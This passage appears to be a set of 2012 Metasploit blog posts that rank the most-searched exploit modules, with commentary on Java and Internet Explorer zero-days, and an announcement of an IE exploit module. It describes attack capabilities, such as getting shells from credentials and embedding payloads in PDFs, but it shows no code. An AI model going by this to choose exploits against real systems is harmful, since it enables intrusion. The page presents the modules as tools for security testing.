requests to PHP-CGI installtions, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. Back from #8 on August's Exploit Trends.10. Apache mod_isapi <= 2.2.14 Dangling Pointer: Although this is an exploit in Apache, don't be fooled! It's only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module's release), and it's only a DoS. Again, kind of a mystery as to why it's so popular. Down one place from #9 last month.If you' d like to try out any of these exploits, download Metasploit for free!

Exploit Trends: Java and IE 0days

Each month we report the top ten searched exploit and auxiliary modules on metasploit.com. The statistics are drawn from our exploit database by analyzing webserver logs of searches, not through Metasploit usage which is not tracked to preserve privacy.With the Java and Internet…

Each month we report the top ten searched exploit and auxiliary modules on metasploit.com. The statistics are drawn from our exploit database by analyzing webserver logs of searches, not through Metasploit usage which is not tracked to preserve privacy.With the Java and Internet Explorer 0-days in August and September, this month's exploit trends from Metasploit really shook-up the status quo. And, just to make things more interesting, there are a couple exploits from April that came back for an encore at numbers 9 & 10.Without further ado, here are September's Top Ten Exploits with commentary from Metasploit guru todb.1. Java Atomic Reference Array Type Violation Vulnerablity (CVE-2012-0507): A returning entry from the April Top 10, this module makes its comeback because of all the Java 0day traffic from August. This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug.The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that just works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed. Returning entry from the April Top 10 Exploits.2. Java 7 Applet Remote Code Execution: Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshow. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. Down one place from #1 last month.3. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability: This bug started off with Eric Romang's blog post and ended up with a module being cooked up over a weekend by Eric, @binjo, and the Metasploit exploit dev team. This event, like the Java 0-day, had the net effect of speeding up the vendor's patch schedule. If there was no public, open exploit, would there have been a patch so rapidly? Was it connected with Java 0-day? Who's the primary source for these critical client-side bugs, anyway? These and other questions are still being speculated on and debated in the security industry and security press. New entry this month.4. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It's also got a great pile of language pack targets. All of Metasploit's exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it's reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft's Security TechCenter. Down two places from #2 since last month.5. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody's gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down two places from #3 since last month.6. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It's now pretty much a case study in stack buffer overflows in Windows, so it's got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Down two places from #4 since last month.7. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft's Security TechCenter. Down two places from #5 since last month.8. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. Even though it's a lowly #10, I'd bet it's the most-used module in classroom and test environments. More on this topic in at the National Vulnerability Database. Down two places from #6 since last month.9. Apache mod_isapi <= 2.2.14 Dangling Pointer: Another returning module from April, although why this one's back is a bit more of a mystery. Although this is an exploit in Apache, don't be fooled! It's only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module's release), and it's only a DoS. Again, kind of a mystery as to why it's so popular. Returning entry from the April Top 10 Exploits.10. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop: The third April comeback module, and still not sure why this module is popular -- it's a client side DoS. Historically, it's a neat DoS, since it demos a bug in Windows 7's kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. Returning Entry from the April Top 10 Exploits. If you want to use any of these exploits right now, you can download Metasploit for free!

New Metasploit 0-day exploit for IE 7, 8 & 9 on Windows XP, Vista, and 7

We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current…

We have some Metasploit freshness for you today: A new zero-day exploit for Internet Explorer 7, 8, and 9 on Windows XP, Vista and 7. Computers can get compromised simply by visiting a malicious website, which gives the attacker the same privileges as the current user. Since Microsoft has not released a patch for this vulnerability yet, Internet users are strongly advised to switch to other browsers, such as Chrome or Firefox, until a security update becomes available. The exploit had already been used by malicious attackers in the wild before it was published in Metasploit. The associated vulnerability puts about 41% of Internet users in North America and 32% world-wide at risk (source: StatCounter). We have added the zero-day exploit module to Metasploit to give the security community a way to test if their systems are vulnerable and to develop counter-measures.Here's the back story: Some of you may remember that a couple of weeks ago, the Metasploit exploit team released a blog regarding a new Java exploit (CVE-2012-4681), with a blog entry titled "Let's Start the Week with a New Java 0day in Metasploit". You'd think the 0-day attack from the same malicious group might cool down a little after that incident... well, you'd be wrong. Because last weekend, our fellow researcher and Metasploit contributor Eric Romang just spotted another 0-day, possibly from the same group, exploiting a Microsoft Internet Explorer use-after-free vulnerability.The Metasploit team has had the pleasure to work with Mr. Romang and @binjo together, and pretty soon we had a working exploit. You may download Metasploit here, and apply the latest update to pick up the exploit.The following screenshot demonstrates a successful attack against a Windows 7 machine with Internet Explorer 9 installed:This one is against Internet Explorer 8 installed:Here's another example exploiting a fully-patched Windows XP SP3 box:The exploit also works against Windows Vista, but I think you guys get the point now.To try out this module, get your free Metasploit download now, or update your existing installation. In the meantime, we will keep this blog updated when more progress has been made.==========UPDATE:Sep 17th, 2012 - Microsoft releases advisory 2757760: http://technet.microsoft.com/en-us/security/advisory/2757760Sep 18th, 2012 - CVE assigned as: CVE-2012-4969Sep 19th, 2012 - Microsoft releases "fix-it", and has been verified working. More information can be found here. We still advise users to use the Metasploit module to test if the workaround is working properly or not, because even if the installer says "the fix has been processed", exploitation could still happen under specific circumstances.  Here's an example.Sep 20th, 2012 - Microsoft updates the "fix-it" advisory to revision 2.0.  Requirements clarified: 1) "For computers that are running 64-bit operating systems, the following Fix it solution only applies to 32-bit versions of Internet Explorer." 2) Before you apply this Fix it solution, you must ensure that Internet Explorer is fully updated by using the Windows Update service.Sep 21st, 2012 - Microsoft releases MS12-063.  Please apply the patch ASAP!Sep 25th, 2012 - Make sure to check out Eric's blog post on "How to find latest IE vulnerability (CVE-2012-4969) with Nexpose"

Exploit Trends: August Java 0-day

Coming from August's Java 0-day release, there are three new Java exploits among the top 10 most searched Metasploit exploits and auxiliary modules in this month's trend list. The monthly statistics are drawn from our exploit database by analyzing webserver logs of searches on metasploit.…

Coming from August's Java 0-day release, there are three new Java exploits among the top 10 most searched Metasploit exploits and auxiliary modules in this month's trend list. The monthly statistics are drawn from our exploit database by analyzing webserver logs of searches on metasploit.com, not through Metasploit usage which is not tracked for privacy.Check out the top searched exploits and modules below, annotated with Tod Beardley's excellent comments:Java 7 Applet Remote Code Execution: Of course, this is the reason why all the other Java modules leapt up in the rankings. In case you've been on safari for the last several weeks and haven't heard the story yet. Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshow. Here's the twist: Nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. New entry this month.Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It's also got a great pile of language pack targets. All of Metasploit's exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it's reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft's Security TechCenter. Down one place from #1 last month.MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody's gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down one place from #2 last month.Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It's now pretty much a case study in stack buffer overflows in Windows, so it's got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Same position as last month.Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft's Security TechCenter. Down 2 places from #3 last month. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It's not sexy, but it's super handy for testing payloads and setup. Even though it's a lowly #10, I'd bet it's the most-used module in classroom and test environments. More on this topic in the National Vulnerability Database. Up two places from #7 since last month.Java Signed Applet Social Engineering Code Execution: Like the Adobe PDF Embedded EXE Social Engineering module, this is a really solid go-to module for social engineering payloads. A simple Google search turns up dozens of demonstration videos from all around the world on how to use this module. Up one place from #8 since last month.PHP CGI Argument Injection: This exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installtions, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. Up one place from #9 since last month.Java Applet Rhino Script Engine Remote Code Execution: This module from late November of 2011 used to be the go-to Java exploit for browser targets - of course, that all changed with the new Java 0-day we released this month. This module most likely jumped up the rankings as everyone and their brother pawed through the Metasploit Exploit DB for all things Java. We got a ton of coverage on the Java 0-day event, so that aura certainly skewed the numbers for this module, even when it was already pretty popular. New entry since last month.Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it's on this list, it's probably the most popular social engineering-style module. More on this topic in at the National Vulnerability Database.  Same position as last month.If you want to use any of these exploits right now, you can download Metasploit for free!

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now